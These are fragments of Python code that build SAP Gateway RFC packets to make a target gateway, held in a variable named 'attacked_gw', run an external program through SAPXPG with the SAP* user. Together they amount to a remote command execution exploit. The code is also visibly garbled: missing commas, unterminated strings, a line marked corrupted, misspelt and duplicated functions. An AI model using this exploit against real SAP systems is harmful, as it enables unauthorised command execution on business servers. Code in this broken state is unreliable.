def do_connect(self, args): """ Initiate the connection to the Gateway service. The connection is registered using the client_string runtime option. """ # Create the socket connection try: self.connection = SAPRoutedStreamSocket.get_nisocket( self.options.remote_host, self.options.remote_port, self.options.route_string, base_cls=SAPRFC) except SocketError as e: self._error("Error connecting with the Gateway service") self._error(str(e)) return self._print("Attached to %s / %d" % (self.options.remote_host, self.options.remote_port)) p = SAPRFC(version=int(self.runtimeoptions["version"]), req_type=1) self._debug("Sending check gateway packet") try: response = self.connection.send(p) except SocketError: self._error("Error connecting to the gateway monitor service") else: self.connected = True
def do_noop(self, args): """ Send a noop command to the Gateway service. """ if not self.connected: self._error("You need to connect to the server first !") return p = SAPRFC(version=int(self.runtimeoptions["version"]), req_type=9, cmd=1) self._debug("Sending noop packet") response = self.connection.send(p)
def build_p2(): dt_structure = SAPRFCDTStruct(version=96, padd1='\x00\x00\x00\x00\x00\x00\x00\x00', root_id = '\x0E\x02\x00\x00\x00\x00\xE8\x4D\x23\x00\xDF\x07\x00\x00\x01\x00', conn_id = '\x4E\xD5\x81\xE3\x09\xF6\xF1\x18\xA0\x0A\x00\x0C\x29\x00\x99\xD0', conn_id_suff=0, timeout =-1, keepalive_timeout=-1, export_trace=2, start_type='DEFAULT', net_protocol=10, local_addrv6='::{}'.format(attacked_gw['ip']) long_lu = attacked_gw['ip'], padd3 = '\x00' * 16, user= '******', padd4 = '\x20' * 8, padd5 = '\x00' * 4, padd6 = '\x20' * 12, padd7 = '\x00' * 16, addr_ipv4=attacked_gw['ip'], padd8 = '\x00' * 4, long_tp = 'sapxpg', ) ext_inf = SAPRFCEXTEND(short_dest_name=attacked_gw['dest_name'], ncpic_lu='196.168.50.46' ncpic_tp='sapxpg' ctypes='STARTED_PRG', clientInfo=1, ncpic_parameters_padd='\x00\x00', comm_idx=0, conn_idx=65535, ) p2 = SAPRFC(version=6,func_type='F_SAP_INIT', protocol = 'CPIC', MODE=0, UID=19, gw_id=65535, err_len=0, info2='WITH_LONG_LU_NAME', trace_level=0, time=0 info='GW_EXTENDED_INIT_OPTIONS+GW_DIST_TRACE', padd_appc=0, vector=0, appc_rc='CM_OK', sap_rc=0, sap_ext_header =ext_inf, sap_param=dt_structure ) #p2.show2() return p2
def build_p1(ip, inbr): p1 = SAPRFC( version=2, req_type='GW_NORMAL_CLIENT', address=ip, service='sapgw{}'.format(inbr), codepage=4103, lu='sapserve', tp='sapgw{}'.format(inbr), conversation_id=' ' * 8, appc_header_version=6, accept_info='EINFO+PING+CONN_EINFO', idx=-1, ) return p1
def build_p3(conv_id): cpic_suf = SAPCPICSUFFIX( suff_padd1='\x10\x04\x02', suff_unk1='\x00\x01\x87\x68\x00\x00\x04\x4c\x00\x00\x0b\xb8', suff_padd2='\x10\x04\x0b', suff_unk2='\xff\x7f\xfa\x0d\x78\xb7\x27\xde\xf6\x19\x62\x93\x25\xbf\x15\x93\xef\x73\xfe\xeb\xdb\x51\xed\x00\x00\x00\x00\x00\x00\x00\x00\x00', suff_padd3='\x10\x04\x04', suff_unk3='\x00\x16\x00\x07\x00\x10\x00\x07', suff_padd4='\x10\x04\x0d', suff_unk4='\x00\x00\x00\x27\x00\x00\x01\x0c\x00\x00\x00\x35\x00\x00\x01\x0c', suff_padd5='\x10\x04\x16', suff_unk5='\x00\x11', suff_padd6='\x10\x04\x17', suff_unk6='\x00\x22', suff_padd7='\x10\x04\x19', suff_unk7='\x00\x00', suff_padd8='\x10\x04\x1e', suff_unk8='\x00\x00\x03\x67\x00\x00\x07\x58', suff_padd9='\x10\x04\x25', suff_unk9='\x00\x01', suff_padd10k='\x10\x04\x09', suff_kernel=attacked_gw['Kernel'], suff_padd10='\x10\x04\x1d', suff_unk10='\x30', suff_padd11='\x10\x04\x1f', suff_cli1='Windows 7 Professional 6.1 (7601) Servic', suff_padd12='\x10\x04\x20', suff_cli2='IE 9.10.9200.16618', suff_padd13='\x10\x04\x21', suff_cli3='Office 12', suff_padd14='\x10\x04\x24', suff_unk14='\x00\x00\x04\x1a\x00\x00\x07\x80', suff_padd15='\x10\x04\x13', suff_unk15='\x02\xe1\xd4\x81\xe3\x0b\x21\xf1\x01\xa0\x0a\x00\x0c\x29\x00\x99\xd0\x01\x37\xd5\x81\xe3\x88\x9a\xf1\x6b\xa0\x0a\x00\x0c\x29\x00\x99\xd0\x00', ) xpg = SAPRFXPG( xpg_padd100='\x05\x12\x02\x05', xpg_convid_1='CONVID', xpg_padd101='\x02\x05\x02\x05', xpg_strstat_l='STRTSTAT', xpg=padd102='\x02\x05\x02\x05', xpg_xpgid_l='XPGID', xpg_padd103='\x02\x05\x02\x01', xpg_extprog_l='EXTPROG', xpg_padd104='\x02\x01\x02\x03', xpg_extprog_val='{: <128}'.format(cmd), xpg_padd105='\x02\x03\x02\x01', xpg_longparam_l='LONG_PARAMS', xpg_padd106='\x02\x01\x02\x03', xpg_longparam_val='{: <1024}'.format(cmd_lparams), xpg_padd107='\x02\x03\x02\x01', xpg_param_1='PARAMS', xpg_padd108='\x02\x01\x02\x03', xpg_stderrcntl_1='STDERRCNTL', xpg_padd110='\x02\x01\x02\x03', xpg_stderrcntl_val='M', xpg_padd111='\x02\x03\x02\x01', xpg_stdinctl_1='STDINCNTL', xpg_padd112='\x02\x01\x02\x03', xpg_stdinctl_val='M', xpg_padd113='\x02\x03\x02\x01', xpg_stdoutcntl_l='STDOUTCNTL', xpg_padd114='\x02\x01\x02\x03', xpg_stdountcntl_val='M', xpg_padd115='\x02\x03\x02\x01', xpg_termcntl_1='TERMCNTL', xpg_padd116='\x02\x01\x02\x03', xpg_termcntl_val='C', xpg_padd117='\x02\x03\x02\x01', xpg_trcaecntl='TRACECNTL', xpg_padd118='\x02\x01\x02\x03', xpg_tacecntl_val='6', xpg_padd119='\x02\x03\x03\x01', xpg_log_l='LOG', xpg_padd120='\x03\x01\x03\x30', xpg_log_val1='\x00\x00\x00\x01', xpg_padd121='\x03\x30\x03\x02', xpg_unk1='\x00\x00\x00\x80\x00\x00\x00\x00', ) cpic_params2 = SAPCPICPARAM2(# dunno why this value param1='\xe3\x81\xd5\x4e\xf6\x09\x19\xf1', param2 = '\xe3\xa0\xba\x9a\xec\xea\x55\x80\x0a\x4e\xd5', param_sess_1 = '\x81\xe3',#session ist part param_sess_2 = '\x09\xf6\xf1\x18',#session 2nd part mask='225.0.0.0', ip= attacked_gw['ip'], #Extremely cricital and dangerous flag=1, ) cpic_params2=SAPCPICPARAM2(#dunno ths values param1='\xe3\x81\xd5\x4e\xf6\x09\x19\xf1', #session mask='160.10.0.12', ip = '41.0.153.208', #Dangerous and critical ) th = SAPRFCTHStruct( th_eyecl="*TH*", th_version=3, th_len=230, th_trace_flag=0, th_sysid='{}/{}_{}_{}'.format(attacked_gw["sid"],attcked_gw[hostname],attacked_gw['sid'],attacked_gw['instance']), th_service=1, th_service=1, th_userid='SAP*', th_action='SM49', th_acttype=1, th_pressysid='{}/{}_{}_{}'.format(attacked_gw["sid"],attacked_gw['hostname'],attacked_gw['sid'],attacked_gw['instance']), th_id='37D581E3889AF16DA00A000C290099D0001', th_some_cpic_params=cpic_params, th_eyec2="*TH*", ) cpic = SAPCPIC( cpic_start_padd='\x01\x01\x00\x08', cpic_cpic_leng=257, cpic_padd003="\x01\x01\x01\x01", cpic_unk02="", cpic_padd0002='\x01\x01\x01\x03', cpic_unk01="\x00\x00\x06\x1b", cpic_padd0001="\x01\x03\x01\x06 cpic_ cpic_padd002="\x01\x01\x01\x03", cpic_unk02="\x00\x00\x06\x1b", cpic_padd001="\x01\x03\x01\x06", cpic_unk00="\x04\x01\x00\x03\x01\x03\x02\x00\x00\x00\x23", cpic_padd001="\x01\x06\x00\x07", cpic_ip='un #corrupted ) p3 = SAPRFC(version=6, func_type='F_SAP_SEND', protocol='CPIC', mode=0, uid=19, gw_id=1, err_len=0, info3=0, timeout=500,#timeout im miliiseconds info4=0, seq_no=0, sap_param_len=8, padd_appc=0, info = 'SYNC_CPIC_FUNCTION+WITH_GW_SAP_PARAMS_HDR+R3_CPIC_LOGIN_WITH_TERM', vector='F_V_SEND_DATA+F_V_RECEIVE', appc_rc='CM_OK', sap_rc=0, conv_id=conv_id, cm_ok_padd='\x00'*31 + '\x02', sap_cpic=cpic, cpic_packet_size=len(cpic), rfc_packet_size=28000, ) #p3.show2() return p3
def buld_p4(conv_id): cpic_params = SAPCPICPARAM( param1='\x00\x99\xd0\x1e', param2='\xe3\xa0\xba\x9a\xec\xea\x55\x80\x0a\x4e\xd5', param_sess_1='\x81\xe3', # session 1st part? param_sess_2='\x09\xf6\xf1\x18', # session 2nd part? mask='160.10.0.12', ip='41.0.153.208', flag=2, ) cpic_params2 = SAPCPICPARAM2( #dunno why this values param1='\xe3\x81\xd5\x4e\xf6\x09\x19\xf1', mask='160.10.0.12', ip='41.0.153.208', ) sap_xpg_end = SAPRFXPG_END( xpg_end_padd001='\x05\x12\x02\x05', xpg_end_ecode_l='EXITCODE', xpg_end_padd002='\x02\x05\x02\x05', xpg_end_estat_l='STRTSTAT', xpg_end_padd003='\x02\x05\x03\x01', xpg_end_log_l='LOG', xpg_end_padd004='\x03\x01\x03\x30', xpg_end_unk1='\x00\x00\x00\x01', xpg_end_padd005='\x03\x30\x03\x02', xpg_end_unk2='\x00\x00\x00\x80\x00\x00\x00\x00', ) cpic_suf = SAPCPICSUFFIX( suff_padd1='\x10\x04\x02', suff_unk1='\x00\x01\x87\x68\x00\x00\x04\x4c\x00\x00\x0b\xb8', suff_padd2='\x10\x04\x0b', suff_unk2= '\xff\x7f\xfa\x0d\x78\xb7\x27\xde\xf6\x19\x62\x93\x25\xbf\x15\x93\xef\x73\xfe\xeb\xdb\x51\xed\x00\x00\x00\x00\x00\x00\x00\x00\x00', suff_padd3='\x10\x04\x04', suff_unk3='\x00\x16\x00\x07\x00\x10\x00\x07', suff_padd4='\x10\x04\x0d', suff_unk4= '\x00\x00\x00\x27\x00\x00\x01\x0c\x00\x00\x00\x35\x00\x00\x01\x0c', suff_padd5='\x10\x04\x16', suff_unk5='\x00\x11', suff_padd6='\x10\x04\x17', suff_unk6='\x00\x22', suff_padd7='\x10\x04\x19', suff_unk7='\x00\x00', suff_padd8='\x10\x04\x1e', suff_unk8='\x00\x00\x03\x67\x00\x00\x07\x58', suff_padd9='\x10\x04\x25', suff_unk9='\x00\x01', suff_padd10k='\x10\x04\x09', suff_kernel=attacked_gw['kernel'], suff_padd10='\x10\x04\x1d', suff_unk10='\x30', suff_padd11='\x10\x04\x1f', suff_cli1='Windows 7 Professional 6.1 (7601) Servic', suff_padd12='\x10\x04\x20', suff_cli2='IE 9.10.9200.16618', suff_padd13='\x10\x04\x21', suff_cli3='Office 12', suff_padd14='\x10\x04\x24', suff_unk14='\x00\x00\x04\x1a\x00\x00\x07\x80', suff_padd15='\x10\x04\x13', suff_unk15= '\x02\xe1\xd4\x81\xe3\x0b\x21\xf1\x01\xa0\x0a\x00\x0c\x29\x00\x99\xd0\x01\x37\xd5\x81\xe3\x88\x9a\xf1\x6b\xa0\x0a\x00\x0c\x29\x00\x99\xd0\x00', ) cpic2 = SAPCPIC2( cpic_padd015_1='\x01\x36', some_cpic_params=cpic_params, cpic_padd016='\x01\x36\x05\x02', cpic_convid_label='', cpic_padd017='\x05\x02\x00\x0b', cpic_kernel3=attacked_gw['kernel'], cpic_padd018='\x00\x0b\x01\x02', cpic_RFC_f='SAPXPG_END_XPG', cpic_padd019='\x01\x02\x05\x03', cpic_unk4='', cpic_padd021='\x05\x03\x05\x14', some_cpic_params2=cpic_params2, cpic_padd022='\x05\x14\x04\x20', cpic_unk6='\x00\x00\x00\x00', cpic_padd023='\x04\x20\x05\x12', cpic_unk7='', xpg_end=sap_xpg_end, cpic_padd024='\x03\x02\x01\x04', cpic_suff=cpic_suf, cpic_end_padd='\x01\x04\xff\xff', cpic_end='', cpic_end_sig='\xff\xff\x00\x00', ) p4 = SAPRFC( version=6, func_type='F_SAP_SEND', protocol='CPIC', mode=0, uid=19, gw_id=1, err_len=0, info2=0, trace_level=0, time=0, info3=0, timeout=500, info4=0, seq_no=0, sap_param_len=8, padd_appc=0, info= 'SYNC_CPIC_FUNCTION+WITH_GW_SAP_PARAMS_HDR+R3_CPIC_LOGIN_WITH_TERM', vector='F_V_SEND_DATA+F_V_RECEIVE', appc_rc='CM_OK', sap_rc=0, conv_id=conv_id, cm_ok_padd='\x00' * 31 + '\x02', sap_cpic_cut=cpic2, cpic_packet_size=len(cpic2), rfc_packet_size=28000, ) #p4.show2() return p4
def buld_p3(conv_id): cpic_suf = SAPCPICSUFFIX( suff_padd1='\x10\x04\x02', suff_unk1='\x00\x01\x87\x68\x00\x00\x04\x4c\x00\x00\x0b\xb8', suff_padd2='\x10\x04\x0b', suff_unk2= '\xff\x7f\xfa\x0d\x78\xb7\x27\xde\xf6\x19\x62\x93\x25\xbf\x15\x93\xef\x73\xfe\xeb\xdb\x51\xed\x00\x00\x00\x00\x00\x00\x00\x00\x00', suff_padd3='\x10\x04\x04', suff_unk3='\x00\x16\x00\x07\x00\x10\x00\x07', suff_padd4='\x10\x04\x0d', suff_unk4= '\x00\x00\x00\x27\x00\x00\x01\x0c\x00\x00\x00\x35\x00\x00\x01\x0c', suff_padd5='\x10\x04\x16', suff_unk5='\x00\x11', suff_padd6='\x10\x04\x17', suff_unk6='\x00\x22', suff_padd7='\x10\x04\x19', suff_unk7='\x00\x00', suff_padd8='\x10\x04\x1e', suff_unk8='\x00\x00\x03\x67\x00\x00\x07\x58', suff_padd9='\x10\x04\x25', suff_unk9='\x00\x01', suff_padd10k='\x10\x04\x09', suff_kernel=attacked_gw['kernel'], suff_padd10='\x10\x04\x1d', suff_unk10='\x30', suff_padd11='\x10\x04\x1f', suff_cli1='Windows 7 Professional 6.1 (7601) Servic', suff_padd12='\x10\x04\x20', suff_cli2='IE 9.10.9200.16618', suff_padd13='\x10\x04\x21', suff_cli3='Office 12', suff_padd14='\x10\x04\x24', suff_unk14='\x00\x00\x04\x1a\x00\x00\x07\x80', suff_padd15='\x10\x04\x13', suff_unk15= '\x02\xe1\xd4\x81\xe3\x0b\x21\xf1\x01\xa0\x0a\x00\x0c\x29\x00\x99\xd0\x01\x37\xd5\x81\xe3\x88\x9a\xf1\x6b\xa0\x0a\x00\x0c\x29\x00\x99\xd0\x00', ) xpg = SAPRFXPG( xpg_padd100='\x05\x12\x02\x05', xpg_convid_l='CONVID', xpg_padd101='\x02\x05\x02\x05', xpg_strstat_l='STRTSTAT', xpg_padd102='\x02\x05\x02\x05', xpg_xpgid_l='XPGID', xpg_padd103='\x02\x05\x02\x01', xpg_extprog_l='EXTPROG', xpg_padd104='\x02\x01\x02\x03', xpg_extprog_val='{: <128}'.format(cmd), xpg_padd105='\x02\x03\x02\x01', xpg_longparam_l='LONG_PARAMS', xpg_padd106='\x02\x01\x02\x03', xpg_longparam_val='{: <1024}'.format(cmd_lparams), xpg_padd107='\x02\x03\x02\x01', xpg_param_l='PARAMS', xpg_padd108='\x02\x01\x02\x03', xpg_param_val='{: <255}'.format(cmd_params), xpg_padd109='\x02\x03\x02\x01', xpg_stderrcntl_l='STDERRCNTL', xpg_padd110='\x02\x01\x02\x03', xpg_stderrcntl_val='M', xpg_padd111='\x02\x03\x02\x01', xpg_stdincntl_l='STDINCNTL', xpg_padd112='\x02\x01\x02\x03', xpg_stdincntl_val='R', xpg_padd113='\x02\x03\x02\x01', xpg_stdoutcntl_l='STDOUTCNTL', xpg_padd114='\x02\x01\x02\x03', xpg_stdoutcntl_val='M', xpg_padd115='\x02\x03\x02\x01', xpg_termcntl_l='TERMCNTL', xpg_padd116='\x02\x01\x02\x03', xpg_termcntl_val='C', xpg_padd117='\x02\x03\x02\x01', xpg_tracecntl_l='TRACECNTL', xpg_padd118='\x02\x01\x02\x03', xpg_tracecntl_val='6', xpg_padd119='\x02\x03\x03\x01', xpg_log_l='LOG', xpg_padd120='\x03\x01\x03\x30', xpg_log_val1='\x00\x00\x00\x01', xpg_padd121='\x03\x30\x03\x02', xpg_unk1='\x00\x00\x00\x80\x00\x00\x00\x00', ) cpic_params = SAPCPICPARAM( param1='\x00\x99\xd0\x1e', param2='\xe3\xa0\xba\x9a\xec\xea\x55\x80\x0a\x4e\xd5', param_sess_1='\x81\xe3', # session 1st part? param_sess_2='\x09\xf6\xf1\x18', # session 2nd part? mask='225.0.0.0', ip=attacked_gw['ip'], flag=1, ) cpic_params2 = SAPCPICPARAM2( #dunno why this values param1='\xe3\x81\xd5\x4e\xf6\x09\x19\xf1', mask='160.10.0.12', ip='41.0.153.208', ) th = SAPRFCTHStruct( th_eyec1="*TH*", th_version=3, th_len=230, th_trace_flag=0, th_sysid='{}/{}_{}_{}'.format(attacked_gw["sid"], attacked_gw['hostname'], attacked_gw['sid'], attacked_gw['instance']), th_serevice=1, th_userid='SAP*', th_action='SM49', th_acttype=1, th_presysid='{}/{}_{}_{}'.format(attacked_gw["sid"], attacked_gw['hostname'], attacked_gw['sid'], attacked_gw['instance']), th_id='37D581E3889AF16DA00A000C290099D0001', th_some_cpic_params=cpic_params, th_eyec2="*TH*", ) cpic = SAPCPIC( cpic_start_padd='\x01\x01\x00\x08', cpic_cpic_length=257, cpic_padd0003="\x01\x01\x01\x01", cpic_unk02="", cpic_padd0002="\x01\x01\x01\x03", cpic_unk01="\x00\x00\x06\x1b", cpic_padd0001="\x01\x03\x01\x06", cpic_unk00="\x04\x01\x00\x03\x01\x03\x02\x00\x00\x00\x23", cpic_padd001="\x01\x06\x00\x07", cpic_ip='{: <15}'.format(attacked_gw['ip']), cpic_padd002='\x00\x07\x00\x18', cpic_ip2=attacked_gw['ip'], cpic_padd003='\x00\x18\x00\x08', cpic_host_sid_inbr='{}_{}_{}'.format(attacked_gw['hostname'], attacked_gw['sid'], attacked_gw['instance']), cpic_padd004='\x00\x08\x00\x11', cpic_rfc_type='3', cpic_padd005='\x00\x11\x00\x13', cpic_kernel1='{} '.format(attacked_gw['kernel']), cpic_padd006='\x00\x13\x00\x12', cpic_kernel2='{} '.format(attacked_gw['kernel']), cpic_padd007='\x00\x12\x00\x06', cpic_dest=attacked_gw['dest_name'], cpic_padd008='\x00\x06\x01\x30', cpic_program='SAPLSSXP', cpic_padd009='\x01\x30\x01\x11', cpic_username1='SAP*', cpic_padd010='\x01\x11\x01\x14', cpic_cli_nbr1=attacked_gw['cli_nbr'], cpic_padd011='\x01\x14\x01\x15', cpic_unk1='E', cpic_padd012='\x01\x15\x00\x09', cpic_username2='SAP*', cpic_padd013='\x00\x09\x01\x34', cpic_cli_nbr2=attacked_gw['cli_nbr'], cpic_padd014='\x01\x34\x05\x01', cpic_unk2='\x01', cpic_padd015_0='\x05\x01', # <---- cpic_padd015_1='\x01\x36', # <---- some_cpic_params=cpic_params, cpic_padd016='\x01\x36\x05\x02', cpic_convid_label='', cpic_padd017='\x05\x02\x00\x0b', cpic_kernel3=attacked_gw['kernel'], cpic_padd018='\x00\x0b\x01\x02', cpic_RFC_f='SAPXPG_START_XPG_LONG', cpic_padd019='\x01\x02\x05\x03', cpic_unk4='', cpic_padd020='\x05\x03\x01\x31', cpic_th_struct=th, cpic_padd021='\x01\x31\x05\x14', some_cpic_params2=cpic_params2, cpic_padd022='\x05\x14\x04\x20', cpic_unk6='\x00\x00\x00\x00', cpic_padd023='\x04\x20\x05\x12', cpic_unk7='', xpg_p=xpg, cpic_padd024='\x03\x02\x01\x04', cpic_suff=cpic_suf, cpic_end_padd='\x01\x04\xff\xff', cpic_end='', cpic_end_sig='\xff\xff\x00\x00', ) p3 = SAPRFC( version=6, func_type='F_SAP_SEND', protocol='CPIC', mode=0, uid=19, gw_id=1, err_len=0, info2=0, trace_level=0, time=0, info3=0, timeout=500, info4=0, seq_no=0, sap_param_len=8, padd_appc=0, info= 'SYNC_CPIC_FUNCTION+WITH_GW_SAP_PARAMS_HDR+R3_CPIC_LOGIN_WITH_TERM', vector='F_V_SEND_DATA+F_V_RECEIVE', appc_rc='CM_OK', sap_rc=0, conv_id=conv_id, cm_ok_padd='\x00' * 31 + '\x02', sap_cpic=cpic, cpic_packet_size=len(cpic), rfc_packet_size=28000, ) #p3.show2() return p3